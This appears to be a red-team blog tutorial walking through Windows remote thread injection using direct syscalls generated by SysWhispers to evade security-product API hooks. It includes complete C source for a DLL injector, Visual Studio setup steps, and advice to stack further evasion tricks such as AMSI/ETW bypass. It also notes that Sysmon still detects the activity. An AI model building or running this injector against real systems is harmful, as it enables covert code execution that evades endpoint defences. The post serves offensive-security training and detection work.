In the API calls listed below, we can see that loading ntdll.dll and then locating the various functions within it generates a lot of API calls. Therefore, the next step is to stop resolving these functions at run time and issue the syscalls ourselves with custom assembly, rather than having ntdll.dll or kernelbase.dll do it for us.

Direct Syscalls

Using Direct Syscalls for RemoteThreadInjection

Up to this point, we first used the high-level, MSDN-documented Windows APIs to access process memory, change it, and create a remote thread in an external process. Next, we went one step lower, resolved the Nt* functions residing in ntdll.dll at run time, and called them directly. Now, we are going to remove the dependency on those ntdll.dll exports and conduct the syscalls with our own custom assembly rather than having ntdll.dll or kernelbase.dll do it for us.

To generate the ASM and header files, we will use SysWhispers. SysWhispers helps with evasion by generating header/ASM files that implants can use to make direct system calls. The functions in ntdll.dll that make the syscalls consist of just a few assembly instructions, so re-implementing them in your own implant can avoid triggering security product hooks. SysWhispers gives red teamers the ability to generate header/ASM pairs for any system call in the core kernel image (ntoskrnl.exe) across any Windows version starting from XP. The headers also include the necessary type definitions.

Generate the ASM and header files for our code and copy the generated H/ASM files into the project folder:

What does the ASM look like?

We will be calling these instructions directly.

What does the header file include?

It includes all the type definitions which we were manually inserting to invoke NTDLL function APIs.

To enable Assembly language support in Visual Studio, go to Project →Properties →Build Customizations… and enable MASM.

In the Solution Explorer, add the syscalls.h and syscalls.asm files to the project as header and source files, respectively.

Go to the properties of the syscalls.asm file, and set the Item Type to Microsoft Macro Assembler:

The type definitions are now provided by the header file, syscalls.h, so we can remove the type definitions we wrote earlier for the NTDLL functions. Below is the modified code:

#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "syscalls.h"

int Error(const char* str) {
    printf("%s (%lu)\n", str, GetLastError());
    return 1;
}

int main(int argc, const char* argv[]) {
    if (argc < 3) {
        printf("Usage: RemoteThreadInjection <PID> <DLL PATH NAME>\n");
        return 0;
    }

    const unsigned char* shellcode = NULL;
    shellcode = (const unsigned char*)argv[2];
    LPVOID allocation_start;
    SIZE_T payload_size = strlen(argv[2]) + 1;  // Path length plus the terminating NUL
    SIZE_T allocation_size = payload_size;      // Rounded up to whole pages by the allocation call
    HANDLE hProcess = NULL, hThread = NULL;
    int pid = atoi(argv[1]);
    CLIENT_ID cid;
    cid.UniqueProcess = (PVOID)(ULONG_PTR)pid;
    cid.UniqueThread = 0;
    allocation_start = nullptr;
    OBJECT_ATTRIBUTES objAttr;
    InitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL);

    NtOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &objAttr, &cid);
    if (!hProcess)
        return Error("Failed to open process");

    NtAllocateVirtualMemory(hProcess, &allocation_start, 0, &allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    NtWriteVirtualMemory(hProcess, allocation_start, (PVOID)shellcode, payload_size, 0);
    NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, hProcess,
        (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA"),
        allocation_start, FALSE, 0, 0, 0, nullptr);
    return 0;
}

Let’s look at the API calls for the above program using API Monitor:

We don’t see the suspicious pattern that we saw in the previous API calls. That’s because we did not resolve any functions from NTDLL to conduct the syscalls. We can still see GetModuleHandleW and GetProcAddress, as we used these two functions to locate LoadLibraryA for loading our DLL. This can also be avoided if we use shellcode instead of a DLL.

Although we can avoid userland API hooking, this activity is still logged as Sysmon events, because Sysmon collects its telemetry through a kernel-mode driver rather than userland hooks.

Let’s quickly look at the Sysmon events for all three scenarios we performed above:

1. Sysmon logs when we used Kernel32 functions/APIs (OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread):

2. Sysmon logs when we used NTDLL functions/ APIs (NtOpenProcess, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx):

3. Sysmon logs when we used Direct Syscalls:

Conclusion

Red Team

We can evade userland API Hooking by using Direct Syscalls. Mixing this technique with others such as PPID Spoofing, Arbitrary Code Guard, sRDI or off-binary payload ingestion, BlockDLLs, AMSI/ETW Bypass, etc. can allow us to operate with less noise.

Blue Team

As shown in this post, Sysmon can detect the injection in all three scenarios. It is a free Windows Sysinternals tool with several features that should be rolled into your detection processes. Below are a few of the best blogs, which I highly recommend:

References:

Note: In case I have missed any reference, please let me know and I’ll add that to the list. Apologies in advance. Happy Learning!😊
